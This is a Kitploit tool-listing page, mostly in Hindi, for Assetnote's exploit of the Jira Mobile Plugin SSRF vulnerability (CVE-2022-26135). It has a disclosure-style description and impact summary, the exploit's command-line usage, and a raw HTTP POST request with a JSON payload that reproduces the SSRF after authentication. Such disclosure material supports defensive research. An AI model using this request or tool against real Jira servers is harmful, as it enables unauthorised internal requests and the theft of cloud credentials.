Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
jira-mobile-ssrf-exploit — Jira Mobile Rest Plugin SSRF (CVE-2022-26135) के लिए एक्सप्लॉइट कोड | Kitploit
उपकरण/GitHubGitHub/assetnote/jira-mobile-ssrf-exploit
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubassetnote/jira-mobile-ssrf-exploit

jira-mobile-ssrf-exploit

Jira Mobile Rest Plugin SSRF (CVE-2022-26135) के लिए एक्सप्लॉइट कोड

रिपॉजिटरी देखें
85154 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-26135 - Jira डेटा सेंटर और सर्वर के मोबाइल प्लगइन में फुल-रीड सर्वर साइड रिक्वेस्ट फोर्जरी

Assetnote के बारे में

Assetnote स्वचालित रूप से आपकी बाहरी संपत्तियों का मानचित्रण करता है और गंभीर सुरक्षा उल्लंघनों को रोकने में मदद करने के लिए उनमें बदलाव और सुरक्षा मुद्दों की निगरानी करता है।

यह शोध Assetnote की सुरक्षा अनुसंधान टीम द्वारा किया गया था।

आप हमारे उत्पाद और हमारी टीम के बारे में https://assetnote.io पर अधिक पढ़ सकते हैं।

ब्लॉग पोस्ट

इस भेद्यता की खोज के लिए उठाए गए कदमों का विवरण देने वाला ब्लॉग पोस्ट यहाँ पाया जा सकता है।

विवरण

Jira Core और Jira Service Desk प्रमाणीकरण के बाद सर्वर-साइड रिक्वेस्ट फोर्जरी की चपेट में हैं। कुछ मामलों में, बिना ज्ञात क्रेडेंशियल्स के इस सर्वर-साइड रिक्वेस्ट फोर्जरी दोष का शोषण करने के लिए Jira Core या Jira Service Desk में खुले साइन-अप का लाभ उठाना संभव है।

प्रभाव

SSRF भेद्यता हमलावरों को किसी भी HTTP विधि, हेडर और बॉडी का उपयोग करके मनमाने URL पर HTTP अनुरोध भेजने की अनुमति देती है। जब Jira को क्लाउड वातावरण में तैनात किया जाता है, तो एक हमलावर मेटाडेटा IP पते के माध्यम से क्लाउड क्रेडेंशियल या अन्य संवेदनशील जानकारी प्राप्त करने के लिए इस शोषण श्रृंखला का लाभ उठा सकता है।

प्रभावित सॉफ्टवेयर

Atlassian की सलाह के अनुसार, क्या आप प्रभावित सॉफ्टवेयर संस्करण चला रहे हैं, यह पुष्टि करने के लिए कृपया निम्नलिखित ज्ञानकोष लेख देखें: https://confluence.atlassian.com/jira/jira-server-security-advisory-29nd-june-2022-1142430667.html

उपयोग निर्देश

root@kitploit:~
pip3 install -r requirements.txt

और फिर आप निम्न का उपयोग करके एक्सप्लॉइट का उपयोग कर सकते हैं:

root@kitploit:~
python3 exploit.py

मदद:

root@kitploit:~
usage: exploit.py [-h] --target TARGET --ssrf SSRF --mode MODE [--software SOFTWARE] [--username USERNAME] [--email EMAIL] [--password PASSWORD]

optional arguments:
  -h, --help           show this help message and exit
  --target TARGET      i.e. http://re.local:8090
  --ssrf SSRF          i.e. example.com (no protocol pls)
  --mode MODE          i.e. manual or automatic - manual mode you need to provide user auth info
  --software SOFTWARE  i.e. jira or jsd - only needed for manual mode
  --username USERNAME  i.e. admin - only needed for manual jira mode
  --email EMAIL        i.e. [email protected] - only needed for manual jira service desk mode
  --password PASSWORD  i.e. testing123 - only needed for manual mode

यदि आपके पास पहले से Jira / Jira Service Desk के लिए क्रेडेंशियल हैं, तो --mode को manual पर सेट करें और --software आर्गुमेंट को jira या jsd में से किसी एक पर सेट करें।

HTTP अनुरोध

Jira इंस्टेंस में प्रमाणित होने के बाद, इस समस्या को पुन: उत्पन्न करने के लिए निम्नलिखित HTTP अनुरोध का उपयोग किया जा सकता है:

root@kitploit:~
POST /rest/nativemobile/1.0/batch HTTP/2
Host: issues.example.com
Cookie: JSESSIONID=44C6A24A15A1128CE78586A0FA1B1662; seraph.rememberme.cookie=818752%3Acc12c66e2f048b9d50eff8548800262587b3e9b1; atlassian.xsrf.token=AES2-GIY1-7JLS-HNZJ_db57d0893ec4d2e2f81c51c1a8984bde993b7445_lin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Origin: https://issues.example.com
Referer: https://issues.example.com/plugins/servlet/desk
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 63

{"requests":[{"method":"GET","location":"@example.com"}]}
टूल डाउनलोड करें